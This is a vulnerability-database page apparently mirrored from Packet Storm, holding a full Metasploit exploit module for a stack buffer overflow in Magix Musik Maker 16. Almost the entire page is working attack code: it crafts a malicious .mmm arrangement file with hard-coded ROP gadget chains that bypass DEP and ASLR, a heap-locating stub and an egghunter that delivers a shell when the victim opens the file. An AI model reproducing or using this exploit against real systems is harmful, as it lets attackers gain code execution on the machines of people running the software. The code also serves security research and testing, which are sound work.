Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Magix Musik Maker 16 .mmm Stack Buffer Overflow

🗓️ 23 May 2011 00:00:00Reported by corelanc0d3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

This module exploits a stack buffer overflow in Magix Musik Maker 16. An unsafe strcpy() allows overwriting of a SEH handler. Bypasses DEP & ASLR, works on XP, Vista & Windows 7. Egghunter used, may require several seconds to receive a shell

Code
`##  
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Egghunter  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in Magix Musik Maker 16.  
When opening a specially crafted arrangement file (.mmm) in the application, an  
unsafe strcpy() will allow you to overwrite a SEH handler. This exploit  
bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and  
might require up to several seconds to receive a shell.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'acidgen', #found the vulnerability  
'corelanc0d3r' #rop exploit + msf module  
],  
'Version' => '$Revision: 12688 $',  
'References' =>  
[  
[ 'OSVDB', '72455'],  
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 8000, #could be more, but this is enough  
'DisableNops' => 'True',  
'BadChars' => "\x00\x0a\x0d",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Windows Universal DEP & ASLR Bypass',  
{  
'OffSet' => 198,  
'Ret' => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll]  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => 'Apr 26 2011',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),  
], self.class)  
end  
  
def junk  
return rand_text(4).unpack("L")[0].to_i  
end  
  
def exploit  
  
print_status("Creating '#{datastore['FILENAME']}' file ...")  
  
badchars = ""  
eggoptions =  
{  
:checksum => false,  
:eggtag => "Wo0t",  
:depmethod => "copy",  
:depreg => "edi",  
:depdest => "ebp"  
}  
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)  
  
header = "RIFF"  
header << "\x8c"  
header << "A"  
header << "\x07\x00"  
header << "SEKDSVIP"  
header << "\x10\x07\x00\x00\x9b"  
header << "[n"  
header << "\x00" * 5  
header << "\x11"  
header << "\x00" * 3  
header << "\x08"  
header << "\x00" * 3  
header << "D"  
header << "\xac\x00\x00\x11"  
header << "\x00" * 9  
header << "9@"  
header << "\x00\x00\xf0"  
header << "B"  
header << "\x00" * 4  
header << "\xbd\x04\xef\xfe\x00\x00\x01"  
header << "\x00" * 3  
header << "\x10\x00\x04\x00\x02"  
header << "\x00" * 3  
header << "\x10\x00\x04\x00\x02\x00"  
header << "?"  
header << "\x00" * 3  
header << "("  
header << "\x00" * 3  
header << "\x04\x00\x04\x00\x01"  
header << "\x00" * 15  
header << "K"  
header << "\x91"  
header << "2"  
header << "\x01\xd0\x02\x00\x00"  
header << "@"  
header << "\x02\x00\x00"  
header << "UUUUUU"  
header << "\xf5"  
header << "?"  
header << "\x10"  
header << "\x00" * 7  
header << "\xff" * 8  
header << "\x00" * 1680  
header << "LISTx"  
header << "\x95\x02\x00"  
header << "physfile"  
header << "\xf8\x08\x00\x00"  
header << "C:\\Documents and Settings\\"  
header << rand_text(8)  
header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"  
header << "\x00" * 52  
header << "Fat Rocker I_ogg.HDP"  
header << "\x00" * 110  
header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"  
header << "\x00" * 175  
header << "Fat Rocker I.OGG"  
header << "\x00" * 678  
header << "\xf0\xbf"  
header << "\x00" * 22  
header << "\xf0"  
header << "?"  
header << "\x00" * 6  
header << "^@"  
header << "\x00" * 6  
header << "^@"  
header << "\x00" * 264  
  
filename = "C:\\temp\\"  
filename << "\xb3\x10\xf8\x1f" * 14 # slide  
filename << "\x1e\x92\x01\x20" # align  
  
rop_chain1 =  
[  
#API pointer  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
0x1ff810b3, # rop nop  
0x1ff810b3, # rop nop  
0x1ff810b3, # rop nop  
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]  
0x2005012c, # &API ptr  
0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]  
0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]   
junk,  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
junk,  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]   
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]   
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2E9FA63D,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]  
0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]  
# write  
0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]  
junk,  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2E9FA5F9,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]  
junk,  
junk,  
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]  
junk,  
].pack("V*")  
  
  
rop_chain2 = [  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]  
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]   
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2E9FA591,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #  
junk,  
junk,  
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]  
junk,  
junk,  
junk,  
junk,  
0x2E9FB65D,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]  
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]   
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1ffa82ef, # POP EAX # RETN   
junk,  
junk,  
0x2E9FA539,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll]  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10  
junk,  
junk,  
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
junk,  
junk,  
junk,  
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll]  
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2E9FA4D9,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]  
junk,  
junk,  
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
junk,  
junk,  
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2E9FA469,  
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]  
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]  
junk,  
0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN  
junk,  
].pack("V*")  
  
rop_chain3 = [  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08  
junk,  
junk,  
junk,  
junk,  
0x1ffa82ef, # POP EAX # RETN  
junk,  
junk,  
0x2004FF98,  
0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN  
junk,  
0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]  
0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll]  
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]  
0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll]  
0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN  
junk,  
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]  
0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]  
junk,  
junk,  
#Oh Irony !  
0x6001ac84, # PUSHAD # RETN ** [ijl10.dll]  
].pack("V*")  
  
rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )  
  
# find a close heap  
prehunter = "\x33\xC0" #xor eax,eax  
prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30]  
prehunter << "\x83\xC0\x48" #add eax,48  
prehunter << "\x83\xC0\x48" #add eax,48  
prehunter << "\x8B\x10" #mov edx,[eax]  
prehunter << "\x83\xc2\x4c" #add edx,4c  
prehunter << "\x83\xc2\x4c" #add edx,4c  
prehunter << "\x8B\x12" #mov edx,[edx]  
  
nops = make_nops(100)  
  
filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000  
filler << "\xc2\x53\x02\x20" # RETN  
filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]   
filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run  
filler << "\xff\xff\xff\xff" # access violation  
  
buffer = header  
buffer << filename  
buffer << rop_chain1  
buffer << rop_chain1_filler  
buffer << [target.ret].pack("V")  
buffer << filler  
buffer << rop_chain2  
buffer << rop_chain3  
buffer << prehunter  
buffer << hunter  
buffer << nops  
buffer << egg  
  
filecontent = header + buffer  
  
print_status("Writing payload to file")  
  
file_create(filecontent)  
  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 May 2011 00:00Current
1Low risk
Vulners AI Score1
magix music maker 16stack buffer overflowunsafe strcpyseh handlerdepaslregghunterxpvistawindows 7
14